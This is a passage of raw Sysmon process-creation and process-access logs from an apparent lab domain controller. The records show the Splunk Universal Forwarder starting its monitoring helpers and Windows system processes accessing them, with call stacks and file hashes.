Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.888{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.886{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.885{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.885{59A5CD1D-957D-6005-5F05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.554{59A5CD1D-957D-6005-5E05-00000000A301}2201580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:45.399{59A5CD1D-957D-6005-5E05-00000000A301}220C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.976{59A5CD1D-957E-6005-6005-00000000A301}29603684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.820{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.821{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.898{59A5CD1D-9580-6005-6205-00000000A301}69884584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 